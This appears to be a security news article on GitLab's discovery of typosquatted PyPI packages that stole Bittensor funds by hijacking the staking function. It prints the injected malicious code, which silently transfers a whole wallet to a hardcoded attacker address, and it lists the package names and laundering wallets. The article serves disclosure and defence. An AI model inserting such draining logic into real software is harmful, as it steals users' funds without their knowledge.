GitLab Exposes a Clever Crypto Scam: Malicious PyPI Packages Hijack Bittensor Staking

GitLab’s Vulnerability Research team has exposed a sophisticated cryptocurrency theft campaign targeting the Bittensor decentralized AI network through malicious typosquatted Python packages. The operation relied on subtle naming variations to trick developers into installing compromised code, which then drained victims’ wallets under the guise of normal staking activity.

“We discovered multiple typosquatted variations of legitimate Bittensor packages, each designed to steal cryptocurrency from unsuspecting developers and users,” the report states.

On August 6, 2025, within just 25 minutes, attackers published five malicious PyPI packages imitating legitimate Bittensor components:

• bitensor@9.9.4
• bittenso-cli@9.9.4
• qbittensor@9.9.4
• bitensor@9.9.5
• bittenso@9.9.5

These names closely mirrored the real bittensor and bittensor-cli packages, exploiting common typing errors and version number familiarity to maximize accidental installs.

Technical analysis revealed that attackers hijacked the stake_extrinsic function in bittensor_cli/src/commands/stake/add.py. Instead of staking user tokens as expected, the modified code executed a silent wallet-draining transaction:

result = await transfer_extrinsic(
  subtensor=subtensor,
  wallet=wallet,
  destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
  amount=amount,
  transfer_all=True,
  prompt=False
)

This injected logic:

• Bypassed confirmation (prompt=False)
• Drained entire wallets (transfer_all=True)
• Hardcoded attacker’s wallet address
• Executed during a normal staking process, making theft harder to detect

The attackers’ focus on staking operations was calculated:

1. High-value victims – Stakers typically hold substantial balances.
2. Wallet access guaranteed – Staking requires unlocked wallets, enabling direct fund transfers.
3. Low suspicion – Blockchain transactions are expected during staking, masking malicious activity.
4. Routine behavior – Experienced users may skip double-checking transactions.
5. Delayed discovery – Victims may mistake theft for staking fees or temporary holds.

As GitLab notes, this method “exploited both the technical requirements and user psychology of routine blockchain operations.”

Investigators tracked stolen funds to a multi-hop laundering network:

• Primary collection wallet: 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR
• Intermediate wallets: Multiple addresses to obscure the trail
• Final consolidation: 5D6BH6ai79EVN51orsf9LG3k1HXxoEhPaZGeKBT5oDwnd2Bu
• Cash-out endpoint: 5HDo9i9XynX44DFjeoabFqPF3XXmFCkJASC7FxWpbqv6D7QQ

Related Posts:

• Cosmos Hub’s LSM: North Korean Development Raises Security Concerns
• Malicious Go Packages Target Developers with Hidden Loader Malware on Linux and macOS
• Malicious PyPI Package Targets Discord Developers with Token Theft and Backdoor Exploit

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy

Do Son

Do Son (aka Ddos) is a seasoned news reporter, bringing over a decade of expertise to the forefront of cyber security and technology reporting. My work provides timely and insightful analysis of emerging trends and critical developments in these rapidly evolving sectors.